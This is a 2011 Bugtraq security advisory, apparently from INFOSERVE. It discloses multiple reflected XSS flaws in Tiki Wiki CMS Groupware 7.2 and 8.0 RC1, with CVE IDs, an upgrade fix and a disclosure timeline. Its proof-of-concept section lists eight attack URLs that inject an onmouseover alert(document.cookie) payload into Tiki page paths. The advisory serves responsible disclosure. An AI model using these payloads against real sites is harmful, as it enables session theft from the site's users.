| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <201111171328.pAHDSq1C007240@sf01web2.securityfocus.com> Date: Thu, 17 Nov 2011 13:28:52 GMT From: security@...oserve.de To: bugtraq@...urityfocus.com Subject: Tiki Wiki CMS Groupware Multiple XSS vulnerabilities Advisory: Tiki Wiki CMS Groupware Multiple XSS vulnerabilities Advisory ID: INFOSERVE-ADV2011-01 Author: Stefan Schurtz Contact: security@...oserve.de Affected Software: Successfully tested on Tiki 7.2 & 8.0 RC1 Vendor URL: http://info.tiki.org/ Vendor Status: fixed for Tiki 7 (New Tiki 6 LTS release in progress) CVE-ID: CVE-2011-4454, CVE-2011-4455 ========================== Vulnerability Description ========================== All versions of Tiki 6 and Tiki 7 and version Tiki 8.0RC1 are prone to multiple XSS vulnerabilities ================== PoC-Exploit ================== 8.0RC1 http://<target>/tiki-8.0.RC1/tiki-remind_password.php/" onmouseover="alert(document.cookie)" http://<target>/tiki-8.0.RC1/tiki-index.php/" onmouseover="alert(document.cookie)" http://<target>/tiki-8.0.RC1/tiki-login_scr.php/" onmouseover="alert(document.cookie)" http://<target>/tiki-8.0.RC1/tiki-index/" onmouseover="alert(document.cookie)" 7.2 http://<target>/tiki-7.2/tiki-admin_system.php/" onmouseover="alert(document.cookie)" http://<target>/tiki-7.2/tiki-pagehistory.php/" onmouseover="alert(document.cookie)" http://<target>/tiki-7.2/tiki-removepage.php/" onmouseover="alert(document.cookie)" http://<target>/tiki-7.2/tiki-rename_page.php/" onmouseover="alert(document.cookie)" ========= Solution ========= Upgrade to Tiki 8.1 (End-of-Life for Tiki 7.x) ==================== Disclosure Timeline ==================== 02-Nov-2011 - informed Security Team (security@...iwiki.org) 03-Nov-2011 - feedback from vendor 11-Nov-2011 - release of version 8.1 (End-of-Life for Tiki 7.x) ======== Credits ======== Vulnerabilities found and advisory written by the INFOSERVE Security Team =========== References =========== http://info.tiki.org/ http://dev.tiki.org/tiki-view_tracker_item.php?itemId=4027#content1 http://info.tiki.org/article182-Tiki-8-1-Now-Available-End-of-Life-for-Tiki-7-x http://secunia.com/advisories/46740
Powered by blists - more mailing lists